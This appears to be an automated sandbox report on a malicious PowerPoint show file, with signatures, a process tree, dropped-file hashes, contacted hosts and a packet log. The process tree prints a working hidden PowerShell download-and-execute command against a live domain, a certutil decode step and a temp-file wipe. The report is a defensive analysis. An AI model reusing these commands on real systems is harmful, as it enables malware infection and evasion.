Source: C:\Windows\System32\mstsc.exeProcess information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_001702B2 RtlExitUserThread,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_001702B2
Uses certutil -decodeShow sources
Source: unknownProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040DAD5 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,GetProcessHeap,HeapAlloc,ReleaseCapture,CreateFileW,GetFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040DAD5
Contains functionality to query the account / user nameShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040A98B GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetModuleHandleA,GetProcessHeap,GetUserNameA,GetProcessHeap,HeapAlloc,GetClipboardViewer,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,lstrcmpA,GetProcessHeap,GetComputerNameA,GetProcessHeap,HeapAlloc,GetCursor,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardOwner,GetProcessHeap,GetProcessHeap,HeapAlloc,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,CountClipboardFormats,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessWindowStation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCaptur10_2_0040A98B
Contains functionality to query windows versionShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,10_2_0040EFB9
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,10_2_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,10_2_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_2_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_2_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,EnumSystemLocalesA,10_2_0042C859
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_0042C3CE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_1_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,__freea,10_1_0042B9C8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_1_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_1_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_1_0042C5C5
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_1_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__itow_s,10_1_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_1_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_1_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoA,___ascii_strnicmp,10_1_0042FC9F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_1_0042C3CE
Queries information about the installed CPU (vendor, model number etc)Show sources
Source: C:\Windows\System32\mstsc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 281044 Sample:  order.ppsx Startdate:  28/05/2017 Architecture:  WINDOWS Score:  96 0 POWERPNT.EXE 14 8 main->0      started     8750sig Suspicious powershell command line found 5790sig Tries to download and execute files (via powershell) 8652sig Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca) 6062sig System process connects to network (likely due to code injection or exploit) 8844sig Uses certutil -decode 6064sig System process connects to network (likely due to code injection or exploit) 522d1e521081sig Detected TCP or UDP traffic on non-standard ports 89910sig Found evasive API chain (may stop execution after checking mutex) 18610sig Maps a DLL or memory area into another process 21810sig Writes to foreign memory regions 89913sig Found evasive API chain (may stop execution after checking mutex) 66613sig Found stalling execution ending in API Sleep call 87113sig Sample execution stops while process was sleeping (likely an evasion) d1e521083 cccn.nl 46.21.169.110, 80 TechnotopInternetBV Netherlands d1e508725 cccn.nl d1e521081 185.159.82.38, 45000 SkylineTelephone unknown d1e521081->522d1e521081sig d1e356750 484.exe, PE32 0->8750sig 0->5790sig 2 powershell.exe 61 7 0->2      started     2->8652sig 2->6062sig 2->d1e521083 2->d1e508725 4 wscript.exe 7 2->4      started     4->8844sig 4->6064sig 4->d1e521081 6 certutil.exe 2 4->6      started     8 cmd.exe 4->8      started     11 cmd.exe 4->11      started     6->d1e356750 dropped 10 484.exe 8->10      started     10->89910sig 10->18610sig 10->21810sig 13 mstsc.exe 10->13      started     13->89913sig 13->66613sig 13->87113sig process0 signatures0 process2 dnsIp2 signatures2 process4 dnsIp4 signatures4 process6 fileCreated6 process10 signatures10 process13 signatures13 fileCreated0 fileCreated2 fileCreated4

Yara Overview

No Yara matches

Screenshot

windows-stand

Startup

  • system is w7_1
  • POWERPNT.EXE (PID: 2256 cmdline: 'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx' MD5: E24133DD836D99182A6227DCF6613D08)
    • powershell.exe (PID: 2404 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • wscript.exe (PID: 2496 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse' MD5: 979D74799EA6C8B8167869A68DF5204A)
        • certutil.exe (PID: 2988 cmdline: 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe MD5: 0D52559AEF4AA5EAC82F530617032283)
        • cmd.exe (PID: 3052 cmdline: 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
          • 484.exe (PID: 3076 cmdline: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe MD5: 13CDBD8C31155610B628423DC2720419)
            • mstsc.exe (PID: 3140 cmdline: C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe' MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
        • cmd.exe (PID: 3104 cmdline: 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Created / dropped Files

File PathType and HashesMalicious
C:\Users\LUKETA~1\AppData\Local\Temp\168.gop
  • Type: ASCII text, with very long lines, with no line terminators
  • MD5: 9B5AC6C4FD5355700407962F7F51666C
  • SHA: 9FDB4CD70BBFB058D450AC9A6985BF3C71840906
  • SHA-256: E97B266D0B5AF843E49579C65838CEC113562A053B5F87A69E8135A0A82564E5
  • SHA-512: AB85132D845437A7900E03C2F3FA773433815A4893E16F7716A5F800558B5F01827F25463EAFF619F804C484A1D23CDD5F2BCCC0F91B4B4D0C117E87D830B1B3
true
C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
  • MD5: 13CDBD8C31155610B628423DC2720419
  • SHA: 7633A023852D5A0B625423BFFC3BBB14B81C6A0C
  • SHA-256: 55C69D2B82ADDD7A0CD3BEBE910CD42B7343BD3FAA7593356BCDCA13DD73A0EF
  • SHA-512: 19139DAE43751368E19C4963C4E087C6295CC757B215A32CB95E12BDD82BB168DB91EA3385E1D08B9A5D829549DFBB34C17CA29BFCC669C7EAE51456FCD7CA49
true
C:\Users\user\AppData\Local\Temp\ii.jse
  • Type: data
  • MD5: F5B3D1128731CAC04B2DC955C1A41114
  • SHA: 104919078A6D688E5848FF01B667B4D672B9B447
  • SHA-256: 55821B2BE825629D6674884D93006440D131F77BED216D36EA20E4930A280302
  • SHA-512: 65D8A4CB792E4865A216D25068274CA853165A17E2154F773D367876DCC36E7A7330B7488F05F4EE899E40BCAA5F3D827E1E1DF4915C9693A8EF9CAEBD6D4BFB
true
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
  • Type: ASCII text, with CRLF line terminators
  • MD5: 9BBBF02ED684C835719792CAE52BD605
  • SHA: 544F22604861FA0E90A9D3F331970B0BA23A104E
  • SHA-256: AC3288710CDC1EA429A86CD571DB151AF605BCCAB25835368516100548B1A327
  • SHA-512: 656C93718453E89FC79317F85C15C3D5D121A1D168054BCB29603EC65B81599CA79A3B0F4F3E946933EC255589A9E26495CECDC4CC26E0C18DD9DBE70BF461AE
false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK
  • Type: MS Windows shortcut
  • MD5: 773E77A245C432B04B130C277760CB58
  • SHA: C5E7E3F76CCED9C7CFDD6AFAEB0135399E0D1637
  • SHA-256: A9F06483B3363511B826C2B318CBF081FB2DA36E8AC6FFF610E381A831B9171C
  • SHA-512: 7813240406CF09E844EA427FE79360CFC1BC1038F9E38232440829CB6379B870F9A7F94FB8673FD1385B91D9E47BB1CF6A838ACF51C2DF4C55F458263BB45DE2
false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8O4WJHKMFY66QYTIV0PK.temp
  • Type: data
  • MD5: C875DF17852F41B1EAEA2F514899EEF9
  • SHA: C242F37AB873BF9C8EAACE91CB395E3C81975201
  • SHA-256: 8F113C9F937D0CB46759B83AE44543FF670EFB561778F48C9F18929960195247
  • SHA-512: 00435D3B85CEDCA472D5F830FF7A81F688044C9AD917282D55EBE7681C291009D9A248E388DA1137957B7647D9141D30A7B136BF53130D7A90121E3EFA6E9E92
false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\~$order.ppsx
  • Type: data
  • MD5: D149D8C0BFC5BE3568AF34FF1F446568
  • SHA: AE549B879F5AC7333E2083C30821791AB65E37D7
  • SHA-256: 67B893285A43D4D38D48E8DC4E5F4C1B3FD93C55047D360DDCE897E73DCC2CDA
  • SHA-512: 2F45C25497C5BAAD493FF374728E275241312BB698EC019EB4433D0E089C72BED10213C48FF291EFD32A06D97230DECD525D58D43EC8EC7083E841D77544631C
false

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMalicious
cccn.nl46.21.169.110truetrue

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
185.159.82.38unknown
23118SkylineTelephonetrue
8.8.8.8United States
15169GoogleIncfalse
46.21.169.110Netherlands
42755TechnotopInternetBVtrue

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
TrID:
  • PowerPoint Microsoft Office Open XML Format document (133004/1) 97.08%
  • ZIP compressed archive (4004/1) 2.92%
File name:order.ppsx
File size:32895
MD5:823c408af2d2b19088935a07c03b4222
SHA1:df99061e8ad75929af5ac1a11b29f4122a84edaf
SHA256:f05af917f6cbd7294bd312a6aad70d071426ce5c24cf21e6898341d9f85013c0
SHA512:2cc9e87e0d46fdd705ed429abb837015757744783bf1e904f9f22d56288b9554a1bc450142e2b1644a4912c12a522391b354d97956e4cb94890744266249b7f9
File Content Preview:PK........i..J................_rels/.relsUT.....*Y...J.1.........m..i.E..D.....nt...T....T....q....d.9..z..]...u..............,.,.1...as{~.~......q..$d....(.MO.s..B..1y...N1.W.H...J...8.V[.!m......D..(N.).W[]....4gwl[g..../.....PSJ.....!.2+..?.tC.........

File Icon

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Mai 28, 2017 17:18:54.833045006 MESZ5240153192.168.1.168.8.8.8
Mai 28, 2017 17:18:55.158092022 MESZ53524018.8.8.8192.168.1.16
Mai 28, 2017 17:18:55.242506981 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.242549896 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.243097067 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.243801117 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.243819952 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.446979046 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.450790882 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.450833082 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.592204094 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.620583057 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.620608091 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.620836020 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.620879889 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.658356905 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.658390045 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.658598900 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.658648014 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.691008091 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.691260099 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.691301107 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.694314957 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.694482088 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.701215982 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.701244116 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.701253891 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.701461077 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.712805033 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.719968081 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.720232010 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.726447105 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.739748001 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.739774942 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.739878893 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.775693893 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.784358978 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.784384966 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.784564018 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.784591913 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.802707911 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.802737951 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.802845955 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.802874088 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.820676088 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.820810080 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.820835114 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.834151030 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.834177971 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.834290981 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.847592115 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.847619057 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.847728014 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.856555939 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.856580019 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.856590033 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.856698990 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.861704111 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.875453949 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.875479937 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.875754118 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.875775099 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.908334970 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.908364058 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.908730984 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.908751965 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.910757065 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.910784960 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.911083937 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.911106110 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.924309015 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.924649954 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.924670935 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.931389093 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.931499004 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.940063000 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.940089941 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.940099955 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.940423012 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.944761992 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.944791079 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.944801092 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.944907904 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.961672068 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.990370035 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.990442038 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.990454912 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.990995884 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.991024971 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.991132975 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.999619961 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.999650955 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:55.999842882 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:55.999876022 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.005856037 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.005886078 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.006366014 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.006397009 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.019325018 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.019356012 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.019689083 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.019718885 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.038929939 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.038959980 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.039072990 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.039104939 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.040286064 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.040497065 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.040524960 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.046196938 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.046226025 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.046452045 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.046494961 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.056365013 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.056389093 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.056483984 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.056638956 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.056683064 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.066953897 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.066981077 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.067172050 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.067210913 MESZ804923446.21.169.110192.168.1.16
